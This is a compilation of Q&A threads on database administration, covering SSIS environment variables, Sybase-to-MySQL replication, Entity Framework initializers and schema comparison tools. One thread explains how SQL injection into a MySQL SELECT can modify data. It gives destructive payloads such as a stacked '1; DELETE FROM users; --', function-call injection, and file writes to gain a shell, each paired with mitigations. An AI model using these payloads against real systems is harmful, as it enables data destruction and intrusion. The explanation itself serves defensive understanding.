I know it is best practise to use the sproc, [SSISDB].[catalog].[set_environment_variable_value] to update existing Environment Variables.
However, can somebody explain why I can't just run UPDATES on the [SSISDB].[internal].[envrionment_variables] table?
What's the risk here and how is it any different from updating the old SSIS_Configrations table when using the old package deployment method?
It's faster and easier to mass update variables with a single UPDATE, than create a CURSOR to loop through and run the SPROC.
You can review the code of the set_environment_variable_value procedure and notice that it handles many scenarios - such as different datatypes, encrypting sensitive parameters, rollbacks, etc.
Another reason : SSIS catalog structure and envrionment_variables can look different in the newer versions, so your single update statement may not work after an upgrade.
Related
I have two databases: Sybase and MySQL. I need to export records to MySql when these are inserted in Sybase or export in some scheduled event.
I've tried with output statement but this can not be used in triggers or procedures.
Any suggestion to solve this problem?
(disclaimer, I've done similar things previously, but by no means would I consider the answer below the state of the art - just one possible approach
google around something like 'cross-database replication' or 'cross rdbms replication' to see who's done this before.
).
I would first of all see if you can't score an ETL tool do the job without too much work. There are free open source ones and even things like Microsoft SSIS might work on non-MS databases.
If not, I would split this into different steps.
Find an appropriate Sybase output command that exports a subset of rows from one or more tables. By subset I mean you need to be able to add a WHERE clause, not just do a full table dump.
Use an appropriate MySQL import script/command to load the data gotten out of step #1. You may need to cycle back and forth between the 2 till you have something that works manually.
Write a Sybase trigger to insert lookup keys into a to-export table. You want to store at least the tablename & source Sybase table's keys for each inserted row. Use column names like key1_char, key2_char, not the actual column names, that makes it easier to extend to other source tables as needed. keep trigger processing as light as possible. What about updates btw?
Write a scheduled batch on Sybase side to run step #1 for the rows flagged in #3.
Write a scheduled batch on Mysql to import ,via #2, the results of #4. Or kick it off from #4.
Another approach is to do the #3 flagging bit as needed, but use to drive one scheduled batch that SELECTs data from Sybase and INSERTs it into mysql directly.
You'll have to pick up the data from Sybase's SELECT and bind it manually to the INSERT of mysql. But you probably get finer control over whats going on and you don't have to juggle 2 batches. That's what I think a clever ETL would already be doing on your behalf. Any half clever scripting language like php, python or ruby ought to handle it easily. Especially important if you have things like surrogate/auto-generated keys.
Keep in mind that in both cases you'll have to either delete the to-export rows that you've successfully inserted or flag them as done.
Red Gate has some pretty good tools, but I don't think that their Dependency Tracker shows how Tables are effected by the stored procedures that touch them.
Is there any tool that can scan a database and determine what processes INSERT, UPDATE or DELETE records from the table as opposed to just touching\being dependent on them? Seems like this shuld exist by now...
No, dependency tracking still isn't perfect. The reason is that procedures can reference tables by dynamic SQL, dependencies can be broken if objects are dropped and re-created (I've written about how dependencies can break here). The best "first sweep" I have come to rely on is:
SELECT OBJECT_NAME([object_id])
FROM sys.sql_modules
WHERE LOWER(definition) LIKE '%table_name%';
Again, this won't find objects that build statements using dynamic SQL, and it can produce false positives because table_name could be simplistic and part of other object or parameter names, or included only in comments or commented-out code.
You can also check for plans that reference a table using sys.dm_exec_cached_plans and related DMFs/DMVs but note that this won't find any plans that have rolled out of the cache.
Using SQL Search, you can search for the column name and find all the stored procedures where it is used.
It's a Third Party tool and that is Red Gate SQL Search
Features
Find fragments of SQL text within stored procedures, functions, views
and more
Quickly navigate to objects wherever they happen to be on a server
Find all references to an object
Hope this will help you.
I would like to implement a custom database initialization strategy so that I can:
generate the database if not exists
if model change create only new tables
if model change create only new fields without dropping the table and losing the data.
Thanks in advance
You need to implement IDatabaseInitializer interface.
Eg
public class MyInitializer : IDatabaseInitializer<MyDbContext>
{
public void InitializeDatabase(MyDbContext context)
{
//your logic here
}
}
And then set your initializer at your application startup
Database.SetInitializer<ProductCatalog>(new MyInitializer());
Here's an example
You will have to manually execute commands to alter the database.
context.ObjectContext.ExecuteStoreCommand("ALTER TABLE dbo.MyTable ADD NewColumn VARCHAR(20) NULL");
You can use a tool like SQL Compare to script changes.
There is a reason why this doesn't exist yet. It is very complex and moreover IDatabaseInitializer interface is not very prepared for such that (there is no way to make such initialization database agnostic). Your question is "too broad" to be answered to your satisfaction. With your reaction to #Eranga's correct answer you simply expect that somebody will tell you step by step how to do that but we will not - that would mean we will write the initializer for you.
What you need to do what you want?
You must have very good knowledge of SQL Server. You must know how does SQL server store information about database, tables, columns and relations = you must understand sys views and you must know how to query them to get data about current database structure.
You must have very good knowledge of EF. You must know how does EF store mapping information. You must be able to explore metadata get information about expected tables, columns and relations.
Once you have old database description and new database description you must be able to write a code which will correctly explore changes and create SQL DDL commands for changing your database. Even this look like the simplest part of the whole process this is actually the hardest one because there are many other internal rules in SQL server which cannot be violated by your commands. Sometimes you really need to drop table to make your changes and if you don't want to lose data you must first push them to temporary table and after recreating table you must push them back. Sometimes you are doing changes in constraints which can require temporarily turning constrains off, etc. There is good reason why tools which do this on SQL level (comparing two databases) are probably all commercial.
Even ADO.NET team doesn't implemented this and they will not implement it in the future. Instead they are working on something called migrations.
Edit:
That is true that ObjectContext can return you script for database creation - that is exactly what default initializers are using. But how it could help you? Are you going to parse that script to see what changed? Are you going to execute that script in another connection to use the same code as for current database to see its structure?
Yes you can create a new database, move data from the old database to a new one, delete the old one and rename a new one but that is the most stupid solution you can ever imagine and no database administrator will ever allow that. Even this solution still requires analysis of changes to create correct data transfer scripts.
Automatic upgrade is a wrong way. You should always prepare upgrade script manually with help of some tools, test it and after that execute it manually or as part of some installation script / package. You must also backup your database before you are going to do any changes.
The best way to achieve this is probably with migrations:
http://nuget.org/List/Packages/EntityFramework.SqlMigrations
Good blog posts here and here.
I've got one easy question: say there is a site with a query like:
SELECT id, name, message FROM messages WHERE id = $_GET['q'].
Is there any way to get something updated/deleted in the database (MySQL)? Until now I've never seen an injection that was able to delete/update using a SELECT query, so, is it even possible?
Before directly answering the question, it's worth noting that even if all an attacker can do is read data that he shouldn't be able to, that's usually still really bad. Consider that by using JOINs and SELECTing from system tables (like mysql.innodb_table_stats), an attacker who starts with a SELECT injection and no other knowledge of your database can map your schema and then exfiltrate the entirety of the data that you have in MySQL. For the vast majority of databases and applications, that already represents a catastrophic security hole.
But to answer the question directly: there are a few ways that I know of by which injection into a MySQL SELECT can be used to modify data. Fortunately, they all require reasonably unusual circumstances to be possible. All example injections below are given relative to the example injectable query from the question:
SELECT id, name, message FROM messages WHERE id = $_GET['q']
1. "Stacked" or "batched" queries.
The classic injection technique of just putting an entire other statement after the one being injected into. As suggested in another answer here, you could set $_GET['q'] to 1; DELETE FROM users; -- so that the query forms two statements which get executed consecutively, the second of which deletes everything in the users table.
In mitigation
Most MySQL connectors - notably including PHP's (deprecated) mysql_* and (non-deprecated) mysqli_* functions - don't support stacked or batched queries at all, so this kind of attack just plain doesn't work. However, some do - notably including PHP's PDO connector (although the support can be disabled to increase security).
2. Exploiting user-defined functions
Functions can be called from a SELECT, and can alter data. If a data-altering function has been created in the database, you could make the SELECT call it, for instance by passing 0 OR SOME_FUNCTION_NAME() as the value of $_GET['q'].
In mitigation
Most databases don't contain any user-defined functions - let alone data-altering ones - and so offer no opportunity at all to perform this sort of exploit.
3. Writing to files
As described in Muhaimin Dzulfakar's (somewhat presumptuously named) paper Advanced MySQL Exploitation, you can use INTO OUTFILE or INTO DUMPFILE clauses on a MySQL select to dump the result into a file. Since, by using a UNION, any arbitrary result can be SELECTed, this allows writing new files with arbitrary content at any location that the user running mysqld can access. Conceivably this can be exploited not merely to modify data in the MySQL database, but to get shell access to the server on which it is running - for instance, by writing a PHP script to the webroot and then making a request to it, if the MySQL server is co-hosted with a PHP server.
In mitigation
Lots of factors reduce the practical exploitability of this otherwise impressive-sounding attack:
MySQL will never let you use INTO OUTFILE or INTO DUMPFILE to overwrite an existing file, nor write to a folder that doesn't exist. This prevents attacks like creating a .ssh folder with a private key in the mysql user's home directory and then SSHing in, or overwriting the mysqld binary itself with a malicious version and waiting for a server restart.
Any halfway decent installation package will set up a special user (typically named mysql) to run mysqld, and give that user only very limited permissions. As such, it shouldn't be able to write to most locations on the file system - and certainly shouldn't ordinarily be able to do things like write to a web application's webroot.
Modern installations of MySQL come with --secure-file-priv set by default, preventing MySQL from writing to anywhere other than a designated data import/export directory and thereby rendering this attack almost completely impotent... unless the owner of the server has deliberately disabled it. Fortunately, nobody would ever just completely disable a security feature like that since that would obviously be - oh wait never mind.
4. Calling the sys_exec() function from lib_mysqludf_sys to run arbitrary shell commands
There's a MySQL extension called lib_mysqludf_sys that - judging from its stars on GitHub and a quick Stack Overflow search - has at least a few hundred users. It adds a function called sys_exec that runs shell commands. As noted in #2, functions can be called from within a SELECT; the implications are hopefully obvious. To quote from the source, this function "can be a security hazard".
In mitigation
Most systems don't have this extension installed.
If you say you use mysql_query that doesn't support multiple queries, you cannot directly add DELETE/UPDATE/INSERT, but it's possible to modify data under some circumstances. For example, let's say you have the following function
DELIMITER //
CREATE DEFINER=`root`#`localhost` FUNCTION `testP`()
RETURNS int(11)
LANGUAGE SQL
NOT DETERMINISTIC
MODIFIES SQL DATA
SQL SECURITY DEFINER
COMMENT ''
BEGIN
DELETE FROM test2;
return 1;
END //
Now you can call this function in SELECT :
SELECT id, name, message FROM messages WHERE id = NULL OR testP()
(id = NULL - always NULL(FALSE), so testP() always gets executed.
It depends on the DBMS connector you are using. Most of the time your scenario should not be possible, but under certain circumstances it could work. For further details you should take a look at chapter 4 and 5 from the Blackhat-Paper Advanced MySQL Exploitation.
Yes it's possible.
$_GET['q'] would hold 1; DELETE FROM users; --
SELECT id, name, message FROM messages WHERE id = 1; DELETE FROM users; -- whatever here');
I have two databses on a SQL Server -- one for development (call it "TestData"), and one for production (call it "LiveData"). I make changes to TestData -- typically adding tables or adding new fields to existing tables (rarely dropping anything) and creating or modifying Stored Procedures. At some point, I would like to update the LiveData tables, stored procedures, etc. with the changes made to TestData. I only want this to affect the schema, not the actual data. What is the best way to do this? I am new to SQL Server, so the more detailed the explanation, the better.
edit: I know there are third-party programs out there, but I'm looking into ways to do this without a separate software, just using scripts, etc.
You might want to take a look at redgate SQL Compare.
DBComparer is a great free utility to compare schemas. It is a little buggy and crashes sometimes, but other than that it works great.